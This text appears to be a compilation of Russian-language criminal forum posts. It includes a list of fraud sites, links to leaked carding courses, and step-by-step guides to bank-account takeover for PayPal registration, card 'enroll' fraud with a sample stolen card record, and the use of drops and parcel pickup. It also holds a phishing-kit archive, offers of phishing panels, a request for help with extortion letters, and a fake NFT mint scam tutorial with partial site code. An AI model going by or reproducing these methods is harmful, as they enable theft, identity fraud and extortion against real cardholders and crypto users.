hackmoney.narod.ru
hcenter.ru hifigold.com
hokonov.ru
home-work.ru
hous.h12.ru
icezone.ru
icqsale.info
icquin.ruserv.com
i-fb.biz
ifcgroup.ru
ifg-electro.i8.com
iifa.com.ua/invest
impound.biz
impound.org
incomtech.biz
individualka.org
informer45622tld.biz
informs.land.ru
intechnology.h14.ru
intelec4sale.com
intellix.us
intercat.biz/lg.php
internet-magazin.tv
investor2004.ru
investwm.com
investwm.s5.com
ip-host.biz
istart.ru/~freenet
iweb.nm.ru
iz-usa.com
job-career.com.ru
joboffers.narod.ru
kandidatnauk.ru
kard-shop.narod.ru
ke011.narod.ru
kompstarting.narod.ru
komptest.narod.ru
konfiskat.de
konfiskat.org
konfiskat.plazoo.ru
konfiskat.us
konfismarket.ru
konfmobile.h12.ru
konf-shop.com
konftech.com
konftech.org
konfuru.com
kredoline.com
kupitovar.com
kurkon.tripod.com
kvgscomp.com
laptopsdk.com
lekarstva.kiev.ua
leonmobile.hut1.ru
liderdvd.com
link.ru
lohuy.narod.ru
losena.ru
lotto.hotmail.ru
ltd-computers.com
mail-service.ru
malo.pp.ru
mansclub.ru
mashka-kakashka.front.ru
maxsale.tk
megacell.ru
megafaza.ru
megashop.100free.com
mega-trade.org
mepc.ru
merrydating.com
metalolom.narod.ru
mfkp.ru
minardi.com.ua
minisite.coolwebprofits.com
mmorpg-shop.net
mms.atspace.org
mobbix.ru
mobile15.nm.ru
mobile500.ru
mobile-angel.ru
mobile-card.narod.ru
mobilee.netfirms.com
mobilekonfiskat.narod.ru
mobilenium.ru
mobilesfree.100free.com
mobiletel.org
mobileyour.pud.ru
mobilinks.ru
mobilnik.net
mobilnik.org
mobilniki.nm.ru
mobiloff.nm.ru
mobilok.nxt.ru
mobilstar-phone.boom.ru
mobitel.h16.ru
mobshop.nm.ru
money4money.boom.ru
moneyback.ru
moscowgsm.ru
multibalans.narod.ru
mvdmvd.250free.com
mvp-fond.com
mxhost.ru
mytelefon2005.narod.ru
nadom.ru
natla.net
new.dem.ru
new-id.ru
nextworld.ru
nikolailoginov.by.ru
nocs.us
nomeravto.ru
nosoldat.ru
nst-phone.boom.ru
obuchen.com
officemob.com
officemobile.net
ofxgroup.com
okdiplom.com
one.diplom.com
onlineccshop.com
optmobile.100free.com ostorozhno.ru
otsobstvennika.ru
otvet4.narod.ru
otvetest.hostmos.ru
otvet-na-ege.narod.ru
palmShop.ru
partnerss.net
perlmasterbank.com
perspektiva.org
petrescue.us
pfgforex.org
phone-mobilee.narod.ru
pifond.com
pirama.com
piraty.ru
plasmamoscow.com
popover.coolwebprofits.com
pregradnet.narod.ru
prodazha-05.narod.ru
profitteam.vip.su
promo-soft.nm.ru
proshivka.com
proshivki.net
ptsmske38.boxmail.biz
quantus.biz
raciyaonline.ru
realege.narod.ru
real-invest.biz
red-and-white.8k.com
registege2003.narod.ru
renersion.narod.ru
ru2narod.ru
ru2usa.com
ru4ru.com
ru-market.com
rushop.biz
ru-shop.biz
ru-shop.com
rusrus2006.narod.ru
russchool.by.ru
russiancasino.ru
rustest2004.narod.ru
s0m3.ru
salegoods.sbn.bz
santehnika7.ru
school-108.narod.ru
schoolexam2003.narod.ru
scoters.nm.ru
sekretovnet.narod.ru
serialdvd.ru
sgshop.sbn.bz
shop.totalmetal.ru
shopcardcom.22.com1.ru
shopgoods.us
shopmobiles.ru
shopservicecc.com
shpion.boom.ru
simfimarket.info
smal.ru
smartresponder.ru
smegashop.narod.ru
sng.iaadriver.com
soch2003.anort.com
softcabel.ru
softwerk.ru
sonyericsson.su
sos-child.com
sotov-aver.narod.ru
sotovik.tk
specsoft.info
sportfarm.spb.ru
sportsarbitrageinvestor.com
sports-investments.org
sportspointer.com
stockservice.biz
strannix.com
surfjunky.com
telefoncik.ru
tele-fonia.narod.ru
telefors.narod.ru
telekonfiskat.narod.ru
territ0riya.tk
test2003.dtn.ru
test2003.ru
testirovanie.ru
teztour.ru
ti-nation.com
tnd.ru
toehelp.ru
tovarcc.nm.ru
tovaros.ru
tovarzadengi.narod.ru
tovarzawm.com
tovarzawm.com.ru
tovarzawm.h15.ru
tovcity.com
tovop.com
tradesoft.com.ru
trinixmob.narod.ru
tripledddea.us
trode.land.ru/1.htm
ultrahoster.com
ultraprofit.org
uniby.ru
unlockedmobile.ru
uraldesign.ru
usa2ru.biz
usa2ru.com
usa-ru.com
usatovar.com
uxxicom.com
vcd.bxhost.com
verloni25.narod.ru
vipgsm.com
vipgsm.ru
vipinvestclub.com
viplady.ru
viptexnika.com
volny.cz
volonter.h14.ru
vortov.com v-shop.cjb.net
vzlom.us
waitmobile.com
warsmith.ru
washingtonuniversity.us
webbank-wm.com
webcvant.ru
webdepo.ru
webgoods.biz
webit.ru
webmoneyinvest.com
webmoneymaker1.narod.ru
winontotalizator.narod.ru
wm-bank.biz
wm-best.by.ru
wmbingo.ru
wmcrack.info
wmcracker.nm.ru
wm-deposit.com
wmdeposit.net.ru
wm-egold.com
wmfond.com
wmgen.boom.ru
wmget.h1.ru
wmhack.vip.su
wmi-bank.com
wminvest.h12.ru
wmmultiplier.h1.ru
wmn.by.ru
wmoney.us
wmoneybank.by.ru
wmreal.narod.ru
wmthief.narod.ru
wmtrust.com
wmvu.5u.com
wmz-bank.com
wmzinvest.biz
wmzinvest.com
wsbank.biz
x-load.cjb.net
x-load2005.narod.ru
xplicitgroup.net
xxl3000.narod.ru
xxxfilm.chat.ru
yandiplom.com
ydarmag.da.ru
zakazdok.boxmail.biz
zakaznn.narod.ru
zawm.com.ua
zebratrade.com
zeron.h15.ru
zigmynd.org
zigmynd.r52.info
zipru.com
www.worldmobi.narod.ru
bix.atspace.com

Click to expand...

Источник: blackrunet
если найдёте ещё сайты(подобные этим) просьба постить в тему.
непутать с ЭТОЙ темой.

Автора я ее знаю, скинули мне это в телеграме


Кардинг.rar

Посмотреть и скачать с Яндекс Диска

 yadi.sk

Здесь можно скачать слитое обучение кардингу от BlackTime и Plastik которое продавалось за 80.000 рублей
Еще один слив
Описание

***(Форум) - сообщество профессионалов, работающих в сфере кардинга не один год. Их обучения ценятся доступностью и логической связностью изложенной информации, поэтому даже полный ноль сможет сделать первые шаги в таком непростом теневом ремесле как кардинг.

Ссылка на скачивание:

[ Курс WWH 2018.rar (25.67MB) - SendSpace.com

](https://www.sendspace.com/file/kkh8d8)

Send, Receive, Track & Share Your Big Files with SendSpace file sharing!

www.sendspace.com

Кардинг PayPay саморег
Что нам понадобится:

Настроенная виртуальная машина под USA. Банковский аккаунт Wells Fargo Bank или Suntrust Bank.

SSN/DOB желательно под БА.(Банк. Акк.)

Socks5 под холдера БА.

Запускаем виртуальную машину, как пример Windows 7 Eng язык USA, раскладка клавиатуры USA. Банк. Акк. Wells Fargo амера живущего в Бирмингхеме.

Натягиваем Socks5 под USA, штат, город Бирмингхем.

Идём на wellsfargo.com, логинимся в банк аккаунт. Если накосячили с IP т.е. socks,ssh или vds. Вылетят секретные вопросы. Они очень редко продаются в комплекте с БА.

В общем, зашли на аккаунт. Видим счета, балансы. Идём во вкладку Alerts. Выключаем там все оповещения списание,пополнение и так далее. Отключаем оповещения на email и телефон.

Для лучшего эффекта выжидаем 24 часа.

Полазийте по аккаунту, т.к. все акки веллса выглядят одинаково изучите их как следует.

Найдите скан чека и перепишите от туда Account и Routing numbers.

Они понадобятся нам для привязки Bank Account в Paypal.

Как было описано выше о нужде SSN/DOB. Их лучше пробить под холдера БА. Цена в районе 3-6$ за пробив. Либо пару баксов в сервисе. Пробив в сервисе где-то 40-50% успеха.

И так, мы имеем все необходимые данные. Идём на paypal.com

Жмём на регистрацию, выбираем личный аккаунт. Заполняем необходимые поля, регаем на заранее готовое левое мыло скажем на google или yahoo.

DOB - Дата рождения. Вводим пробитые на холдера данные. SSN так-же вводим его. В этом случае у нас есть шанс получить BML - Bill Me Later. Это кредитные средства предоставляемые Paypal на покупки.

После удачной регистрации аккаунта подтверждаем email. Телефон вписываем заранее подготовленный. (Телефон либо берём в аренду у сервиса, либо покупаем номер самостоятельно, об этом будет отдельная статья).

Далее нас попросят прилинковать BA либо CC. Выбираем Link Bank Account. Пролистываем страницу вниз и нажимаем кнопку перехода к старому интерфейсу Paypal. Это повысит шансы привязки BA инстантом (мгновенно).

Нас попросят ввести Account и Routing номера банк. аккаунта. Далее 2 пути. Paypal разрешит линковку мгновенно - попросит ввести логин и пароль от аккаунта. Либо второй путь вышлет 2 минидепа. Которые придут в течении нескольких суток. Посмотреть их мы так-же сможем войдя в БА. Верифицировать БА в Paypal введинием сумм минидепов.

Верифицировать БА в paypal. Мы закажем на него средства. На первых парах заказывайте не более 300$.

Средства поступают от 3 до 5 рабочих дней. Иногда поступают инстантом.

Если вам повезло и холдер не заметил списание средств с БА. Мы получаем готовый саморег с балансом.
Для начала нам нужно понять что тут, как и в любом деле, есть своя цепочка и если просто вбить где-то карту, никто вам товар домой не пришлёт. Как правило эту цепь реализуют 2 человека тот, кто кардит товар и тот кто его принимает. Новичку делать одновременно и то и другое почти не реально. Дальше рассмотрим эти два звена подробней.

Для начала нужно найти магазин, естественно online магазин, в котором мы будем совершать покупку. Жадничать не стоит, т.к. получить плазменник с кинотеатром за 10К не получится по многим причинам. Выбираем себе товар типа ноута или фотика, вобщем ценой ниже 1К -1.5К – для новичков это оптимально IMHO. Дальше берём саму карту, для покупки её нужно подготовить. Т.к. заказать на адрес её владельца не выйдет да и смысла нет. Нужно заказывать на дропа. Дроп это гражданин US, которого развели чтобы он принял посылку и отправил её куда скажут и за это получил свои 30-50 баксов (+ геморняк на всю жизнь вперед – ыыы ). Но не будем торопится, предположим у нас есть вот такая карта:
name_on_card=mark s messina
address1=60 plainfeild ave
city=west haven
state=CT
zipcode=06516
country=US
credit_card=4*****0101504612
exp_month=03
exp_year=2008
cvv2=282

надеюь расшифровывать эти поля никому не нада.
Дальше нужно сделать Enroll.
Для Этого нам понадобится SSN (Social Security Number) + DOB (Day of Birthday)

• MMN (Mother Maiden Name). Найти такую информацию можно у shEn или ™ (на правах рекламы ) Кстати в некоторых банках для энрола, помимо перечисленных данных нужно ищё знать PIN или ATM. Проходить эту степень защиты крайне сложно и нахрен не нада для такого дела. Узнать к какому банку относится карта можно по бину, т.е. по первым цифрам в номере карты. Используйте прогу CC2Bank . Дальше идём на сайт банка, заходим в раздел Enroll (если вы визуально не можете найти этот раздел, испольуйте поиск на сайте банка). Дальше проходим все предлагаемые страны, поэтапно вводя на них данные, e-mail можно вводить любой, желательно не Яху и не Хотмаил конечно. (надеюсь о том, что нужно использовать прокси и т.д. напоминать не нужно). Вы получили Online доступ к карте, тут можно глянуть какой на карте баланс (он должен хотя бы в 2-3 раза превосходить планируемую покупку) и есть раздел где можно изменить данные по карте. (Описывать как называются разделы, где искать эти кнопочки и т.д. не буду – т.к. это глупо, в каждом банке по разному). Итак если баланс хороший, идёт в раздел для смены инфы. Сменить можно только Address1, City, State, Zipcode и Phone number. Берём данные дропа, например это будет:
  70 Tunstill Loop Rd
  Fayetteville
  TN
  37334
  Открытым остаётся вопрос телефона, на который придётся принимать звонок из шопа и возможно потом с него звонить. Благо для этого существует различная Ip Телефония (используем гугл), где можно купить себе внешний номер. Покупаем телефон того же штата, что и дроп. В данном случае Tennessee.
  Дальше перебиваем данные в карте на наши, напишет сколько нужно ждать применения – обычно пара дней, но везде по разному. Поэтому карту отложим на определённое время. По прошествии двух дней карту нужно чекнуть, если у вас нет мерчанта под рукой или собственного x-login – можно сделать проще, пойти на сайт типа nero.com или т.п. торгующий софтом и купить там не нужную херню за 20 баксов. Если оплата прошла успешно – значит карта жива и можно шопится. При вбиве карту нужно использовать СТАРЫЕ Имя, номер, exp и CVV код, остальные данные берем намедни измененные.
  Идём на сайт магазина и делам заказ. (не жмитесь оплатить максимально быструю доставку товара.) Адреса билинг и шипинг (т.е. доставки) теперь одинаковые по понятным причинам. После того как сделан заказ вам пришлют письмо где скажет что вам нужно позвонить или же сами вам позвонят, поэтому будьте online (не забывайте про часовые пояса). Если вы сами не можете разговаривать на eng – попросите опытного прозвонщика. После школьного «Hello. My name is Tom. How are you?» с поганым кацапским акцентом вас пошлют нахуй )) Дальше, если по телефону заказ вы подтвердили удачно, вам дадут Track номер, по которому будет видно (через сайт магаза в определённом разделе) как и где сейчас товар и когда его получит дроп. (Кстати никогда не звоните в магаз сами, если вас об этом не попросили – деклайн гарантирован). Затем уже работа дроповода, ему необходимо позвонить дропу с дать указание куда выслать товар, какой службой и т.д. – можно слать товар на скупщика, некоторые себе домой шлют =)) Это уже дело ваше.

И так. Вы в кардинге, Вы новичок.
Только прошли обучение, или вовсе полный 0 и только начинаете.
Первый вопрос в голове: Что делать, с чего начать?
Гифты, paypal, пикап, прямой вбив сс?
Все вокруг говорят про первые шаги, про слив денег на материал, про сплошные неудачи.
Все эти вопросы жутко давят Вам на мозг и психику.
Ведь хочется как можно быстрее выйти в профит с минимальными потерями.
Ведь хочется? Хоочется!
)
Так ловите пару пенсионных советов =))

У меня для Вас всего два варианта, два пути.

МОЙ ЛЮБИМЫЙ ENROLL

Да да, именно энролл. Нет ничего проще чем енролл.
Зачем тратить время на егифты, вбивы на разные билл\шип или билл=шип. Тратиться на дорогой еу мат.
На много проще сделать енролл. Роллку можно:
- вбить на скупа за процент
- вбить на пересыл и продать за больший процент в РУ
- можно просто продать другому вбивале (быстрые деньги)

Какие навыки нужны для зароливания:
- Уметь работать с SSH\Socks
- Пробивать SSN\DOB (и то не обязательно, есть куча пробивщиков)
- Уметь регистрировать почту

У меня на одну роллку уходит 14$.
9$ СС (шоп HTA) из свежей базы + 1$ SSH + 3$ пробив SSN\DOB + примерно 1$ на комиссии при переводе битка.
Можно снизить расходы, брать СС из старых баз. Так роллка выходит в 6$. Но тут зависит от шопа, на HTA я доверяю старым базам, валид у них так же на высоте, главное чтоб нужные сс были

Пробив 3$ это если вы будете пробивать данные КХ сами, если у пробивалы то в среднем 6$

Итого роллка может выйти от 6$ до 17$

Вот она роллка у Вас на руках, что же делать дальше?
- Можно продать ее другому вбивале и получить прибыль на много выше чем Вы в нее вложили, как минимум в 2 раза, зависит от баланса роллки.
- Вбить на скупа ликвидный товар и получить в среднем 30% от цены, зависит от стафа.Многие скупы принимают стаф стоимостью от 200$+. Я рекоммендую бить от 1к$+, но если страшно то не менее 500$.
- Вбить на пересыл, а с него на посреда и продать уже как минимум за 50%. Или в ру и продать за еще больший %.
- Найти заказчика на определенный товар и вбить на его адрес, так же за хороший процент

Это краткий обзор то что может Вам дать роллка, я упомянул только вещевуху. В дальнейшем роллки можно проводить через различные сервисы для обнала и т.п. (этим я не занимаюсь сразу говорю)

Что бы вы могли прикинуть, сколько можно заработать вбивая роллки на скупа, приведу Вам пример.
В данный момент я не вбивал больше месяца, но на днях начал вновь потихоньку работать.
С одной роллки я вбил два ордера, на 1400 и 1600 долларов, на скупа под 30%. Процент считается от самой низкой цены на товар в прайсграбере. На выходе я получил около 700$. Одна неделя, одна роллка.
Конечно, не все роллки дадут вбить на такую сумму, или на такое кол-во раз. Но тем не менее шанс на профит очень высок.

Да, риски то же хорошие. Для успеха нам необходимо:
- Дающий шоп
- Роллка которая как минимум не подохнет, а максимум пропустит нашу транзу.
- Дроп который не кинет
Но, волков бояться - в лес не ходить.

Енролл на много лучше чем спускать материал на набивание руки при различных способах вбива.
Ах да, СС не всегда зароливаются. Или SSN\DOB неверны, или уже заролены. Вот такие и будете вбивать в гифты и прочее

PICKUP - ОН ЖЕ ПЕРЕХВАТ

Так же очень хороший способ вбива, на много проще чем энролл.
Одел тунель\сокс\дед и вбил на данные с СС. Все.

Так же как и энролл, вбив на пикап очень благоприятен для фрод системы шопов.
Риски при вбиве на пикап такие же как и при любом другом вбиве. Это и прозвон и отрисовки. Ну и наверное добавим риск запрета на пикап отправителем, да.

Основной минус по сравнению с роллкой, так это то что Вы не видите баланс купленной СС, а так же не знаете актуальный ли на данный момент адрес у этой СС. Но за то не надо париться с пробивом инфы о КХ, осуществлять процесс зароливания. Купил да вбил.

Единственное что могу посоветовать, так это брать СС из свежих баз.
На примере того же XTA, материал из древних баз имеет очень высокий валид, очень. Но зачастую у СС из этих баз уже сменен адрес на новый.
Поэтому под пикап такие СС я не рекоммендую брать, а вот под энролл смело, т.к. адрес при зароливании не нужен.
Но, Вы рисковый кардер, о да) Решили взять СС из старой базы на пикап, но при вбиве мерч ругнулся на неверный адрес. Не спешите отчаиваться, кардим подписку на intelius.com и похожие сервисы, и смотрим последний адрес КХ, возможно он и присвоен этой СС.

Как правило с пикапа выхлоп меньше чем если бить на адреса скупа, надо платить в среднем 100$ за услуги дропа. На выходе сумма меньше.

Но за то по сравнениею с энроллом тут можно взять количеством + если есть 100% дающие шопы то вообще сказка, берем СС из свежих баз и шпарим.

Можно работать с дроп-сервисами, а можно быть более скупым и отладить свою систему приёма паков.

Почтоматы
Автоматизированная станция приёма и выдачи малогабаритных отправлений.
Не нужно взаимодействовать с сотрудниками и т.д. Все что нужно - симка. Единственный минус - большие паки туда не поместить. Зачастую до 10кг и меньше.

Почта России
С недавних пор, появилась услуга приёма посылок без паспорта.
Идём на оф. сайт pochta.ru, внизу кликаем на банер "Ускоренное получение".
Варианты:
• Заполнить анкету и принести её на почту с документами.
Лучше найти дропа, чтобы он всё сделал, либо с поддельными документами самому.
• Регистрация через аккаунт ГосУслуг.
По итогу сможешь получать поссылки по коду с смс, либо с пуш-уведомления.

Курьеры
Кто работает с Мистом, знает, что в 95% случаев курьеру похуй на ваш паспорт, если он связывается по указанному телефону в декларации.
В случае если попросит паспорт, можно спокойно сказать: «Не первый раз забираю, ни разу не просили, с собой нет. Права тоже не взял». Курьерам впадлу заморачиваться и с огромной долей вероятности пак отдадут.

Если курьер слишком праведный, на пак всегда можно заказать повторную доставку. Скорее всего будет смена курьера. Как вариант: сделать перенаправление на дропа. Благо сервисов по ру и юа хватает.
Делается все через звонок посреду. Отправитель может поменять конечный путь доставки. Причин великое множество: уехал, заболел, работаю 24 на 7 и т.д.

Дропы
Стоимость приёма посылок в ру\уа 20-50$. Деньги маленькие, а заебов меньше всего. + в большинства сервисов дропы ручные, а значит проебать пак практически не реально, только если сервис заведомо скам. Такие ситуации к сожалению есть и от них не перестраховаться.

Сайт проекта : https://perceptron.ca/phishware​

На данный момент на сайте 250+ различных фишинг страниц/китов ​

​

Введение:
Пару месяцев назад я начал изучать Go и недавно решил сделать что-то на практике.
У меня уже была идея сделать scanner/crawler фишинг страниц* и я наконец взялся за это дело.
*на подобии этого скрипта:
https://github.com/cybercdh/phishfinder

Коротко о сути проекта:
У нас есть список доменов и ссылок которые подозреваются в фишинге. Источники этих ссылок расписаны на сайте.
Я написал скрипт на го который будет пробовать траверсить эти урл и искать в них активные опендиры.
В случае успеха, в списке файлов он ищет файлы с раширением zip и скачивает их в базу, в тоже время он сохраняет урл пути и название zip файла в отдельную бд. для того чтоб использовать их в будущих сканах.

Цель публикации:
Целью публикации результат моего проекта является создание еще одного ресурса который поможет новичкам (и всем кому интересно) изучить реальные кейсы фишинг страниц/китов и чтоб они могли совершенствовать свои навыки будь то в защите или атаке.

Надо признать что большинство фишинг китов в моем сборнике не эталонного "качества" но я уверен что этот ресурс может послужить отличной точкой для начала изучений.

Далее можно копать в сторону как обезопасить эти страницы, правильно их прятать, правильно настраивать вебсервера, динамично показывать контент (клоачить), фильтровать посетителей итд.


[ GitHub - bluscreenofjeff/Red-Team-Infrastructure-Wiki: Wiki to collect

Red Team infrastructure hardening resources ](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki)

Wiki to collect Red Team infrastructure hardening resources - bluscreenofjeff/Red-Team-Infrastructure-Wiki

github.com

Либо наобарот изучать техники фингерпринта страниц, выявлять паттерны при использовании различных ресурсов (картинок, css, шрифтов), разрабатывать системы защиты от и выявления фишинг страниц, находить имейлы скидов итд для последующих расследований, опять-же смотря какую сторону вы выбрали.
хттпс://twitter.com/JCyberSec/status/1130793084957134848_

Внеси свой вклад:
Все те кто хотят внести свой вклад в этот ресурс могут отправить мне в ПМ свои страницы/киты по этому шаблону:
-Название
-Ссылка на оригинал
-Комментарий
-Ник/Аноним (если желаете не расскрывать свой ник)
-Ссылка на архив (чтоб я мог скачать и перезалить)

Spoiler: Прочее

_На сайте отписал формальный дисклеймер чтоб не потерять домен.

Исходников самого кравлера в этом топе не будет, пока что стыдно давать код на ревью публике, возможно через пару месяцев я буду готов их выложить, в этом топе будет только результат работы моих скриптов.

На данный момент у меня накопилось очень много файлов, сотни архив файлов, и я буду постепенно их проверять и сортировать, этот процесс не быстрый и порой утомительный.

Я постараюсь хотябы 1 раз в неделю загружать в ресурс новые киты/страницы т.ч добавляйте ссылку в закладки.

Если зайти на сайт с Тор браузера он будет выглядит убого, рекомендую заходить через Chrome или Firefox. Контент на сайте статичный и в нем отсутсвуют трекеры/аналитика._

**Последняя книга из данной серии.

Занимайся хакингом как легенда
(Взламываем планету | Книга 4)**

• Авторы : Sparc Flow
• Переводчик: Ianuaria
• Оригинальное название: How to Hack Like a Legend
• Объем в оригинале : 169 стр.
• Дата публикации: 2018
• Тип перевода: перевод на русский
• Формат: текст, PDF
• Дата выдачи перевода: готов к выдаче
• Уровень сложности материала: продвинутый

Описание:

Это история хакера, который во время взлома компании встречает достойный отпор: машинное обучение, анализ поведения, искусственный интеллект...
Большая часть хакерских инструментов обломаются в подобной агрессивной среде.

Что делать хакеру, который сталкивается с подобным, под завязку экипированным противником?

Кибербезопасность в лучшем виде

Мы начнем с построенияК6 живучей C&C-инфраструктуры, используя облачные провайдеры, HTTP Redirector -ы и SSH туннели.
Идея состоит в том, чтобы укрыться за слоем одноразовых машин , которые мы сможем обновлять в течение считанных секунд для полного изменения наших отпечатков.

Далее мы поэтапно настроим фишинговую платформу: фейковый веб-сайт, Postfix- сервер, **DKIM-подписи,SPF **иDMARC.

Искусство проникновения

Вместо того, чтобы напрямую хакнуть нашу цель (оффшорную компанию), мы нацелимся на одного из их поставщиков, которого мы идентифицируем при помощи техник OSINT.
Мы соберем пароли с помощью своей фишинговой платформы и воспользуемся удаленным доступом через Citrix для того, чтобы сделать первый шаг внутрь.

Мы обойдем Applocker и Ограниченный языковой режим в PowerShell, чтобы добиться выполнения кода, затем приступим к разведке и сбору данных поActive Directory.****

Через несколько минут нас выбросят из сети за подозрительную активность.

Искусство эксплуатации

Мы эксплуатируем уязвимость в паттернах паролей , чтобы вернуться обратно на сервер Citrix. Мы сталкиваемся с MS ATA иQRADAR SIEM.
Пытаемся обойти их, используя различные хакерские приемы, и у нас получается отключить все новые возможности безопасности Windows Server 2016 (AMSI, ScriptBlock Logging и так далее).

В процессе того, как мы пытаемся заполучить учетные данные разработчиков, которые по нашему предположению работают над продуктом, используемым в оффшорной компании,
мы также сталкиваемся с антивирусом следующего поколения Windows (ATP).

Завершаем работу внедрением бэкдора в бухгалтерское программное обеспечение таким образом, чтобы обойти большую часть тестов безопасности и функционала.

Забудь про тестирование на проникновение, время вступить в Red team

Наш бэкдор приводит в действие бесфайловую малварь , с помощью которой мы получаем доступ во внутреннюю сеть офшорной компании.
После чего отправляемся на легкую прогулку для получения привилегий администратора домена и доступа к персональным данным тысяч фиктивных компаний и их конечных владельцев.

В книге предоставляются и тщательно объясняются все используемые кастомные пейлоады для атак.

Для чтения книги требуется владеть знаниями о базовых принципах компьютерной безопасности, включая: NTLM, pass-the-hash, Windows Active Directory, объекты групповых политик и так далее.
Если вы слабо владеете данными концепциями, я настоятельно рекомендую вам предварительно прочитать предыдущие книги .

Spoiler: Спойлер: Отказ от ответственности

Примеры в этой книге полностью вымышлены. Описываемые инструменты и техники имеют открытый исходный код, а следовательно - доступны публично. Специалисты по безопасности и пентестеры регулярно используют их в своей работе, также как и атакующие. Если вы стали жертвой компьютерного преступления и обнаружили в этой книге демонстрацию техник или инструментов, то это никоим образом не означает, что автору этой книги и переводчику можно инкриминировать любую связь с компьютерным преступлением, содержимое этой книги не дает никаких оснований полагать, что есть какая-либо связь между автором книги/переводчиком и преступниками.

Любые действия и/или деятельность, связанные с материалом, содержащимся в этой книге, находятся целиком под вашей ответственностью. Неправильное использование информации из этой книги может стать результатом обвинений в совершении уголовного правонарушения в адрес соответствующих лиц. Автор и переводчик не несут никакой ответственности за деяния лиц, использующих информацию из этой книги в преступных целях.

Эта книга не призывает заниматься хакерством, взломом программного обеспечения и/или пиратством. Вся информация, представленная в книге, предназначена исключительно в образовательных целях. Она призвана помочь организациям защитить свои сети от атакующих, а следователям собрать цифровые улики во время расследования инцидентов.

Совершение любых попыток по хакингу/взлому систем или тестирование систем на проникновение должно сопровождаться письменным разрешением от владельцев данных систем.

Оригинал продажника:

Hidden content for authorized users.

https://www.amazon.com/How-Hack-Like-LEGEND-secretive-ebook/dp/B07C1GPJ19/

Скачать:
[CLIKE]

[ MEGA ](https://mega.nz/#!rVs2DQ7A!9qjy6jzpI-

dB5KfjjNgIZJLWN_M0Zd8SsXyVmT9z4oY)

MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now

mega.nz

[/CLIKE]

На безвозмездной основе буду скидывать сюда исходники фиш ( сс, крипта) и парочка лайв панелей. кто возьмет благодарочку оставьте)))

Последние 7 лет искал компании, которые платят за уязвимости. Ломал, писал отчёты, получал свои бабки. В последнее время начали компании кидать, обещали изначально заплатить, если будут критикал баги, но в итоге кидают. Думал ситуация будет не частой, но это начало повторяться не раз. Меня это просто сломало и я перешёл на тёмную сторону. Я начал ломать сайты, в основном сливать бд и требовать выкуп. Из 5 компаний платят двое-трое. Хочу довести письмо в компанию до ума, чтобы платили все 100%. Кто подскажет, как составить хитро письмо, буду весьма признателен, отблагодарю финансово, если письмо выстрелит...

Приветствую всех, кто только начинает развиваться в этой отрасли и тех, кто это уже всё прожевал.
**В данном манауле я расскажу всё об фейк минтах от А до Я и предоставлю соурс код(Код в общем доступе).

Что для этого нам необходимо:
-Минимальное понимание программирования
-Капелька хитрости и ума
-Немного ресурсов
-20$ на хост и домен~**

Меньше воды, больше дела, сразу приступим к делу

И так, что такое NFT я думаю уже все знают, а вот что такое минт?
Минт - это процесс продажи NFT коллекции. Дату минта обозначают сами разработчики.
Минт может быть как и свободного доступа(Т.е. для любого желающего), так и закрытого доступа - только для тех, кто попал в WL(WhiteList / Белый лист)
Способов попасть в белый лист большое количество, но тема не об этом, но если будет интересно - расскажу)
В любом случае, для нас это не важно, ведь мы собираемся делать фейковый минт, а не покупать NFT на официальном ресурсе.

И так, вот настал момент, мы решились создать свой первый скам-проект, остановились на выборе - фейк минт, а откуда нам брать траффик для фейк минта и как его распространять? Или где нам найти, какой проект в скором времени запустится, чтобы сделать под него фейк? Какая прибыль? И как работает этот фейк? Сейчас разберем всё по полочкам.

Как работает фейк:
Работа фейк минта очень проста)
Мы запускаем сайт с использованием Web3(не пугаемся, расскажу), на котором будет идти якобы продажа NFT, пользователь покупает NFT, но бабки летят не в проект NFT-Коллекции, а на ваш кошелек.
Вот мы разобрались, а под что проект то делать?
Где найти проект под который сделать фейк:
Есть различное количество ресурсов, на которых происходят анонсы, продвигаются и рекламируются будущие NFT-коллекции.
Я приведу один пример, а так, ресурсы в общем доступе в поисковиках)

Предстоящие продажи коллекций NFT | CoinMarketCap

Узнайте о коллекциях NFT, которые скоро будут выставлены на торги, включая день и время их размещения, а также на каком блокчейне они будут размещены.

 coinmarketcap.com

Что мы видим, большое количество предстоящих продаж, но как же выбрать, куда залетать?
Придётся немного постараться, чтобы найти хороший проект, ибо их не так уж и много, но по сути говоря - можно залететь в большинство и получить какую никакую скамнутую монету.
Но если желание есть подобрать более хороший проект, то посоветую переходить на ресурсы коллекций и смотреть активность, смотреть количество участников, есть ли WL(Если есть, то проект более серьезный)
Ладно, хорошо, но а есть ли смысл вообще заморачиваться? Какая прибыль то?

Прибыль с фейка:
Доходность конечно же не фиксированная, но и мы тут не за зарплату пришли РАБотать ))
Все в ваших руках, абсолютно полностью в ваших руках, за день можно собрать и ничего, а можно и залутать спокойно >1eth
Пример дохода за запуск одного минта:

Вроде и не так много, но и не мало
Ладно, нам это подходит, для старта пойдёт, но как распространять?

Траффик и распространение:
Тут уже открывается огромное количество дорог
Можно проспамить по участникам дискорд канала NFT-Коллекции
Также можно проспамить по Твиттер подписчикам NFT-Коллекции
(Обязательно делаем ник и аватарку под NFT-Коллекцию)
Вариаций много и предела творческого подхода в этом нет

И так, вот мы уже подобрали проект, собрали все ресурсы для распространения, подходим к делу. Предстоящая продажа NFT-Коллекции от XSS.IS стартует завтра. Упускать такой возможности нельзя.

Вот- вот будет стартовать проект от XSS.IS, нужно быстро что-то предпринять и запустить фейк-минт, но все кодеры заняты?
Не проблема, сейчас покажу на пальцах как за пару часов запустить проект и предоставлю соурс код.

Для старта нужно установить любой редактор кода, я лично использую Visual Studio Code.
Далее для понимания немного информации на простом языке:
CSS - Язык стилей, с помощью него закладывается основа дизайна сайта
HTML - Разметка сайта, проще говоря - указывает сайту где что будет находиться)
JS - Скрипты для взаимодействия с сайтом))

Выгружаем архив, что я приложил, открываем файлы редактором кода
Сам сайт выглядит так:

Разбирать полностью код из соурса мы не станем, ибо это не столь важно и муторно, но поехали разберем по файлам важную структуру для редактирования:

Index.html
Здесь мы видим структуру сайта и подключаемые скрипты
Из важных подключаемых скриптов Web3.js и Script.js
Web3 нам необходим для взаимодействия с метамаском и сетью ERC-20
Script.js скрипт с помощью которого мы соединяем наш сайт с Web3
Также мы наблюдаем в index.html данный код:

HTML:Copy to clipboard

<div id="payment-header">
                    <div id="payment-header-text">
                        <h3 style="text-align:center" id="titleH4"> XSS.IS</h3> <!-- Auto edit (config in index.js) -->
                        <h3 style="text-align:center">FREE Mint LIVE!</h3>
